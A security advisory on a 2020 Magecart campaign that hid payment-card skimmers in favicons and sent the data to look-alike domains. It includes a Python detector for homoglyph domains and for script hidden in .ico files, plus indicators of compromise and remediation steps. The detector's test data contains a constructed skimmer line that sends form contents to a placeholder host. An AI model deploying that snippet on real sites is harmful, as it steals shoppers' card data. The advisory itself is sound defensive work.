August 10, 2020
Severity
High
Analysis Summary
A Magecart web-skimming campaign has been observed using homoglyph (look-alike character) techniques. The actors registered typo-squatted domains that visually imitate legitimate domains of the targeted sites, and replaced the sites' favicons with modified copies that carry the skimmer used to steal payment card data. Researchers traced the exfiltration gateway to a domain that differs from a legitimate domain name by a single character, a "q" standing in for what should have been a "p". Unusually for a sample of the Inter skimming kit, the skimmer was delivered as a .ico file rather than as HTML or JavaScript: the injected favicon is a copy of the legitimate one, but the file also contains JavaScript identified as Magecart skimming code that gathers credit card and billing information. Several other victim sites and their matching look-alike domains were found to belong to the same campaign, and infrastructure overlaps indicate the activity is likely tied to Magecart Group 8.
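The two tricks described above (a domain one confusable character off from the real one, and JavaScript shipped under a .ico name) can both be checked mechanically. The script below is an added example written for this advisory, not code from Rewterz or from the Magecart research it summarises. The confusable-character table, the brand watch-list, the sample domains such as shoq-example.com and the favicon byte strings are all constructed for illustration; the ICO parsing follows the public ICONDIR/ICONDIRENTRY layout.

```python
"""Added example: flag homoglyph / typo-squatted domains and JavaScript hidden in a
favicon (.ico).  All sample data below is constructed for illustration."""
import struct

# Illustrative confusable map: glyph an attacker substitutes -> glyph it imitates.
# Tune it for your own brands; the q-for-p swap is the one the advisory describes.
CONFUSABLES = {"rn": "m", "vv": "w", "cl": "d", "q": "p", "l": "i", "1": "i", "0": "o"}


def skeleton(label):
    """Collapse a domain to a 'visual skeleton' so look-alikes map to the same string."""
    s = label.lower()
    # Multi-character confusables first so 'rn' is not split by the single-char pass.
    for src in sorted(CONFUSABLES, key=len, reverse=True):
        s = s.replace(src, CONFUSABLES[src])
    return s


def osa_distance(a, b):
    """Optimal string alignment distance: edits plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]


def lookalike_of(domain, watchlist, max_distance=1):
    """Return the watch-listed domain that `domain` imitates, or None.
    A hit is an identical visual skeleton (homoglyph) or an edit distance of at
    most `max_distance` (classic typo-squat).  Watch-listed domains are never hits."""
    domain = domain.lower().rstrip(".")
    legit_set = [w.lower() for w in watchlist]
    if domain in legit_set:
        return None
    for legit in legit_set:
        if skeleton(domain) == skeleton(legit) or osa_distance(domain, legit) <= max_distance:
            return legit
    return None


# Byte markers that have no business inside an icon's image data.
JS_MARKERS = (b"<script", b"document.", b"eval(", b"atob(", b"btoa(",
              b"xmlhttprequest", b"fetch(", b"function(")


def has_script_markers(blob):
    low = blob.lower()
    return any(m in low for m in JS_MARKERS)


def ico_trailing_payload(data):
    """Parse ICONDIR + ICONDIRENTRY records and return every byte that lies outside
    the declared directory and image records (b'' if all bytes are accounted for).
    Returns None when `data` is not a well-formed ICO container at all."""
    if len(data) < 6:
        return None
    reserved, img_type, count = struct.unpack_from("<HHH", data, 0)
    if reserved != 0 or img_type != 1 or count == 0:
        return None
    dir_end = 6 + 16 * count
    if len(data) < dir_end:
        return None
    covered = [(0, dir_end)]
    for i in range(count):
        # width, height, colours, reserved, planes, bits-per-pixel, size, offset
        *_, size, offset = struct.unpack_from("<BBBBHHII", data, 6 + 16 * i)
        if offset + size > len(data):
            return None  # directory points past the end of the file
        covered.append((offset, offset + size))
    covered.sort()
    trailing, pos = bytearray(), 0
    for start, stop in covered:
        if start > pos:
            trailing += data[pos:start]
        pos = max(pos, stop)
    trailing += data[pos:]
    return bytes(trailing)


def classify_favicon(data):
    """'clean', 'ico-with-embedded-script' (JS outside image records),
    'script-inside-image-record', 'script-not-ico' (JS served under a .ico name)
    or 'not-ico'."""
    trailing = ico_trailing_payload(data)
    if trailing is None:
        return "script-not-ico" if has_script_markers(data) else "not-ico"
    if has_script_markers(trailing):
        return "ico-with-embedded-script"
    if has_script_markers(data):
        return "script-inside-image-record"
    return "clean"


def build_ico(image_bytes):
    """Constructed helper: minimal single-image ICO container around `image_bytes`."""
    header = struct.pack("<HHH", 0, 1, 1)
    entry = struct.pack("<BBBBHHII", 16, 16, 0, 0, 1, 32, len(image_bytes), 22)
    return header + entry + image_bytes


PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 24  # constructed stand-in for image data
CLEAN_ICO = build_ico(PNG_STUB)
SKIMMER_JS = (b"<script>(function(){var f=document.forms[0];"  # constructed sample
              b"new Image().src='https://shoq.example/c?d='+btoa(f.innerText);})()</script>")
TAINTED_ICO = CLEAN_ICO + SKIMMER_JS   # JS appended after the declared image record
BARE_JS_AS_ICO = SKIMMER_JS            # the advisory's case: script under a .ico name

if __name__ == "__main__":
    watch = ["shop-example.com"]       # constructed brand watch-list
    for d in ["shop-example.com", "shoq-example.com", "shop-exarnple.com", "unrelated.org"]:
        print(f"{d:22} -> {lookalike_of(d, watch)}")
    for name, blob in [("clean", CLEAN_ICO), ("tainted", TAINTED_ICO), ("bare", BARE_JS_AS_ICO)]:
        print(f"{name:8} -> {classify_favicon(blob)}")
```

Run it against the domains seen in outbound requests from a checkout page and against every favicon the page actually loads, not just the one in the template. A favicon whose bytes extend past the records its own directory declares, or whose body contains script markers at all, deserves the same scrutiny as an unexpected third-party script tag.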
Impact
- Theft of sensitive information
- Financial theft
Indicators of Compromise
Domain Name
- zoplm[.]com
- winqsupply[.]com
- fleldsupply[.]com
- cigarpaqe[.]com
Source IP
- 51[.]83[.]209[.]11
Remediation
- Block the threat indicators at their respective controls.
- Always double-check domain names for spelling mistakes; a look-alike may differ by a single substituted character (here a "q" in place of a "p").
- Type your intended domain name instead of clicking on links.
- Site operators should review the domains their pages load resources from and send data to (favicons and scripts included) for look-alikes of their own or their suppliers' domains, since the skimmer in this campaign hid in a favicon and exfiltrated to a domain one character off from a legitimate one.